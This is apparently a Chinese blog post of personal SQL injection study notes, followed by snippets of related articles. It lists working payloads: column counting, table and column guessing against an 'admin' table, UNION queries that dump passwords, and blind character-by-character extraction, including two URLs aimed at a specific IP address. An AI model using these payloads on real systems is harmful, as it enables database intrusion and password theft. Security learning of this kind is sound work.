注入学习

最新推荐文章于 2024-04-17 19:31:57 发布
最新推荐文章于 2024-04-17 19:31:57 发布
阅读量556 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zcc1414/article/details/16941381

1 先查当前文章字段 :

order by 11   //以多少字段排序  正常的最大的那个就是字段数 

2 猜表名

and exists(select * from admin)  //猜有无 admin

3 猜表中字段

and exists(select * from admin order by 4)  //找出admin 字段

4 不知道admin中其他字段 去得到密码

and 1=2 union select 1,2,3,* from admin as a inner join admin as b on a.id=b.id   //admin为4个字段  总共11字段   11-4*2 = 3  这样在页面上出现admin 和密码

5  搜索行 字符注入

'%xxxxx%'

%' and (select top 1 asc(mid(pass,1,1)) from manager)=84 and '%'='   84// manager 是表名   pass是列名  都是猜的  先猜表名 再猜字段名

6

http://222.18.158.62:8080/2/index1.php?order_by=(case when ((select length(password) from admin where id=1) >=8) then id else user end)         //判断有几位


http://222.18.158.62:8080/2/index1.php?order_by=(case when (ord(mid((select password from admin where id=1),1,1))>=51) then id else user end) //判断第几位




SQL注入学习
黑黑的小鸭的博客
08-08 3126
本文是学习过程中所做的笔记,希望可以帮自己理顺SQL注入,也希望能帮助初学者对于SQL注入有一个比较清晰的认识;
sql注入学习
qq_45590470的博客
09-09 2639
sql注入
sql注入详解
热门推荐
渗透之路,攻防之间皆学问
05-05 25万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入学习总结
YouthBelief的博客
10-09 4895
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
SQL注入学习1
2301_81040616的博客
04-17 1586
sql注入
sql注入 学习笔记
weixin_45568648的博客
10-05 2992
自学sql注入
XML注入学习
xujunhui222的博客
02-10 7628
一、什么是XML注入 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 简单来说xml就是用来存储数据的。 二、XML的特点 XML仅仅是纯文本,他不会做任何事情。 XML可以自己发明标签(允许定义自己的标签和文档结构) 三、XML的定义 首先是XML声明,然后是DTD
SQL注入学习--access
ghoooos的博客
02-03 1433
SQL注入,access注入,偏移注入
报错注入学习
m0_63253040的博客
03-28 2398
复习完sqlilabs 1-4关 熟悉了简单sql注入的payload,不用反复看wp的payload,学到了可以 0x5c:/ %23:# %20: (空格) 0x7e=~ -1') union select 1,(select group_concat(username,0x5c,password) from users),3 %23 遇到第五关报错注入 学习文章1 学习文章2 学习笔记: 报错注入原理:报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出...
sql注入学习-知识点大合集
weixin_49349476的博客
05-27 2591
SQL注入是Web应用程序攻击中最常见的攻击方式之一,是影响Web安全的主要问题之一
离子注入学习资料.rar
最新发布
05-07
离子注入技术是半导体器件制造的核心工艺之一,它对于微电子和光电子学领域的发展起到了至关重要...这份“离子注入学习资料.rar”为相关人员提供了一个系统的学习平台,有助于提升他们对这项关键工艺的理解和实践能力。
Dagger2 Android依赖注入学习笔记
08-27
本文将分享Dagger2在Android项目中的依赖注入学习笔记,帮助开发者深入理解并有效利用这一强大的工具。 ### 为什么需要依赖注入 在传统的Android开发中,组件(如Activity、Fragment、Service等)通常会直接创建其...
sqli-labs-master-注入学习靶机
01-19
`sqli-labs-master-注入学习靶机` 提供了一个模拟环境,帮助学习者深入理解SQL注入的工作原理,并提供实践机会来熟悉防御策略。 这个靶机教程由印度开发者创建,旨在帮助用户掌握SQL注入攻击的不同类型,以及如何...
PostGreSQL注入学习.doc
07-18
PostGreSQL注入学习
burpsuit学习--修改来源地址
zcc1414的专栏
10-08 7845
安装Burpsuit: 安装JAVA  环境   JDK 命令: Java –jar burpsuite_v1.4.jar   创建批处理 运行就行了 proxy -> options  设置代理     --------------     IE  上设置代理   -》连接-》局域网 这里就可以监视了 Proxy  ->  History  ->  看到有一条拦截 右
web_XSS安全学习
zcc1414的专栏
09-17 6612
漏洞知识库: 1  CSRF 跨站请求伪造 crossdomain.xml 文件来验证是否允许客户端的flash 跨域发送请求,使用的是白名单的思想 使用 token 足够复杂来防御 同源政策 a.com 通过 加载了b.com 的b.js 但是b.js 是运行在a.com 页面的所以对于a.com来说,b.js的源就应该是a.com而非b.com 等标签都可以跨域加载资
渗透工具学习
zcc1414的专栏
09-09 5538
下面是我学习渗透时的工具学习: 1 httrack  可以拷贝网站  做挂马 等工具使用 kali 上 安装它,然后创建目录  myweb  登陆上去  httack 输入网站名 可以定制抓什么文件,然后就拷贝成功了 2 nmap 很强大   #nmap 192.168.1.1/24 扫描整个子网段 扫描多个目标,命令如下: #nmap 192.168.1.2 192.168.1.
Web_FileInclusion学习
zcc1414的专栏
10-10 3382
文件包含漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值